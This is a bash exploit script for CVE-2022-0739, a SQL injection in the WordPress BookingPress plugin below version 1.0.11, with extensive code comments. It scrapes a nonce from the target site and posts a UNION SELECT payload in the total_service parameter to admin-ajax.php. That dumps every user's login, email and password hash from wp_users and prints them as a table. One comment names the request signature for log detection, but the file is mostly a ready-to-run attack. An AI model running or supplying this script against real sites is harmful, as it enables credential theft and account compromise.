#!/bin/bash
#######################################
# Print the usage text to stdout.
# Globals:   $0 (read, used as the script name in the first line)
# Outputs:   five usage lines on stdout
#######################################
display_help() {
  printf '%s\n' \
    "Usage: $0 [options]" \
    "Options:" \
    "-u, --url VALUE Set the URL (ex: http://example.com) (required)" \
    "-e, --event-dir VALUE Set the event directory (ex: events)" \
    "-h, --help Display this help message"
}
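#######################################
# Fetch the front page (or the event directory page below it) and print
# the first _wpnonce value found in it.
# Globals:   url (read; base URL), dir (read; optional sub-directory)
# Outputs:   the nonce on stdout, or nothing when the page carries none
#######################################
get_nonce() {
  local nonce_url="$url/"
  if [[ -n $dir ]]; then
    nonce_url="$url/$dir/"
  fi
  # Quoted: an unquoted URL is subject to word splitting and glob
  # expansion ('?' and '*' are ordinary URL characters).
  # The extraction assumes the page has _wpnonce in a single-quoted
  # attribute; the fourth '-delimited field of that line is the value.
  curl -s "$nonce_url" | grep "_wpnonce" | head -n 1 | cut -d "'" -f 4
}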
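#######################################
# Print a horizontal table border sized to the three column widths.
# Globals:   login_length, email_length, pass_length (read)
# Outputs:   a line of the form *----*----*----* on stdout, each segment
#            being width + 1 dashes
#######################################
print_line() {
  local width seg
  local line="*"
  for width in "$login_length" "$email_length" "$pass_length"; do
    # Build the dashes with the printf builtin instead of seq + a nested
    # printf: no external command, and a width of 0 yields no dashes.
    printf -v seg '%*s' "$((width + 1))" ''
    line+="${seg// /-}*"
  done
  printf '%s\n' "$line"
}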
#######################################
# Print one table row with each value left-aligned in its column.
# Globals:   login_length, email_length, pass_length (read; column widths)
# Arguments: $1 login column text, $2 email column text, $3 password column text
# Outputs:   the row on stdout
#######################################
print_data_line() {
  local login_text=$1
  local email_text=$2
  local pass_text=$3
  # %-*s takes the width from the preceding argument.
  printf '| %-*s| %-*s| %-*s|\n' \
    "$login_length" "$login_text" \
    "$email_length" "$email_text" \
    "$pass_length" "$pass_text"
}
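#######################################
# Print one table row per entry of the three lists.
# Globals:   list_login, list_email, list_pass (read; whitespace-separated
#            lists), list_login_nb (read; number of rows to print)
# Outputs:   rows on stdout via print_data_line
#######################################
print_datas() {
  local -a logins emails passes
  local i
  # Split on IFS whitespace (spaces and newlines), the same splitting the
  # former `echo $list | awk '{print $i}'` relied on; -d '' makes read
  # consume the whole string rather than its first line only, and the
  # trailing `|| true` absorbs the non-zero status read reports at EOF.
  read -r -d '' -a logins <<< "$list_login" || true
  read -r -d '' -a emails <<< "$list_email" || true
  read -r -d '' -a passes <<< "$list_pass" || true
  for (( i = 0; i < list_login_nb; i++ )); do
    # Quoted arguments: a missing value now leaves its column empty
    # instead of shifting the remaining values one column to the left.
    print_data_line "${logins[i]:-}" "${emails[i]:-}" "${passes[i]:-}"
  done
}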
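#######################################
# Compute a column width for a list of words: the longest word (with a
# floor of 15 characters) plus 5 characters of padding.
# Arguments: one word per argument (callers pass an unquoted list, so
#            whitespace splitting has already happened)
# Outputs:   the width as an integer on stdout
#######################################
get_length() {
  local word
  local max_length=15
  # "$@" keeps each argument as one word and stops glob expansion of
  # values such as "*", which the unquoted form would have expanded.
  for word in "$@"; do
    if (( ${#word} > max_length )); then
      max_length=${#word}
    fi
  done
  echo $(( max_length + 5 ))
}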
# ---- Command-line handling ----
# Script globals: url (base URL, required), dir (optional event directory
# used only when fetching the nonce), nonce (filled in by get_nonce).
url=""
dir=""
nonce=""
# Value-taking options consume their argument with an extra shift; any
# unknown option aborts with status 1 and a message on stderr.
while [[ $# -gt 0 ]]; do
case $1 in
-h|--help) display_help; exit 0;;
-u|--url) url="$2"; shift;;
-e|--event-dir) dir="$2"; shift ;;
*) echo "Exploit aborted: invalid option: $1" >&2; exit 1;;
esac
shift
done
if [[ -z $url ]]; then
echo "[-] URL is required" >&2; exit 1
fi
# Banner: the vulnerability this script targets (the banner names BookingPress
# versions before 1.0.11 as affected) and the effective options.
echo "CVE-2022-0739 - BookingPress < 1.0.11"
echo
echo "Options :"
echo " url : $url"
echo " dir : $dir"
echo
# The AJAX request below carries a WordPress nonce, so one is scraped from a
# public page first; an empty result is reported as a bad URL/directory.
nonce=$(get_nonce)
if [[ -z $nonce ]]; then
echo "[-] Invalid URL/directory" >&2; exit 1
fi
echo "[-] Nonce : $nonce"
echo
# One POST to wp-admin/admin-ajax.php. The total_service parameter is the
# injection point: its value appends a UNION over wp_users to the plugin's
# query. For detection, an admin-ajax.php request with this action value
# and SQL keywords inside total_service is the signature of this script
# in web-server or WAF logs. -i keeps the response headers in $data; the
# parsing below ignores them.
data=$(curl -s -i "$url/wp-admin/admin-ajax.php" --data "action=bookingpress_front_get_category_services&_wpnonce=$nonce&category_id=1&total_service=1000) UNION ALL SELECT user_login,user_email,user_pass,NULL,NULL,NULL,NULL,NULL,NULL from wp_users-- -")
# The three unioned columns are read back from these response keys; the
# variable names record which column each key is expected to carry.
user_login="bookingpress_service_id"
user_email="bookingpress_category_id"
user_pass="bookingpress_service_name"
# `echo $data` (unquoted) flattens the response onto one line; the \K
# lookbehind grep then prints every value of the key, and sed drops the
# JSON escaping backslashes. Each list is newline-separated.
list_login=$(echo $data | grep -oP '"'$user_login'":"\K[^"]+' | sed 's/\\//g')
list_login_nb=$(echo $list_login | wc -w)
# Fewer than two extracted logins is treated as a failed request.
if ! [[ $list_login_nb -gt 1 ]]; then
echo "[-] Invalid URL" >&2; exit 1
fi
list_email=$(echo $data | grep -oP '"'$user_email'":"\K[^"]+' | sed 's/\\//g')
list_pass=$(echo $data | grep -oP '"'$user_pass'":"\K[^"]+' | sed 's/\\//g')
# Column widths for the table: longest value per column plus padding
# (the lists are passed unquoted so get_length sees one word per argument).
login_length=$(get_length $list_login)
email_length=$(get_length $list_email)
pass_length=$(get_length $list_pass)
# ---- Output ----
echo "[-] $list_login_nb users found"
echo
print_line
print_data_line "user_login" "user_email" "user_pass"
print_line
print_datas
print_line